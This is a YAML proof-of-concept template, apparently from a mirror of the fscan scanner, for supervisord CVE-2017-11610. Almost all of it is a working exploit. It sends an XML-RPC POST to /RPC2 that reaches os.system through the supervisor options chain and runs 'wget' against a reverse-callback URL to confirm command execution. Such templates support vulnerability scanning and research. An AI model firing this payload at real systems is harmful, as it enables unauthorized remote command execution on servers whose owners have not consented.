mirror of https://github.com/qwqdanchun/fscan.git
25 lines
665 B
YAML
25 lines
665 B
YAML
name: poc-yaml-supervisord-cve-2017-11610
|
|
set:
|
|
reverse: newReverse()
|
|
reverseURL: reverse.url
|
|
rules:
|
|
- method: POST
|
|
path: /RPC2
|
|
body: >-
|
|
<?xml version="1.0"?>
|
|
<methodCall>
|
|
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
|
|
<params>
|
|
<param>
|
|
<string>wget {{reverseURL}}</string>
|
|
</param>
|
|
</params>
|
|
</methodCall>
|
|
follow_redirects: false
|
|
expression: |
|
|
response.status == 200 && reverse.wait(5)
|
|
detail:
|
|
author: Loneyer
|
|
links:
|
|
- https://github.com/vulhub/vulhub/tree/master/supervisor/CVE-2017-11610
|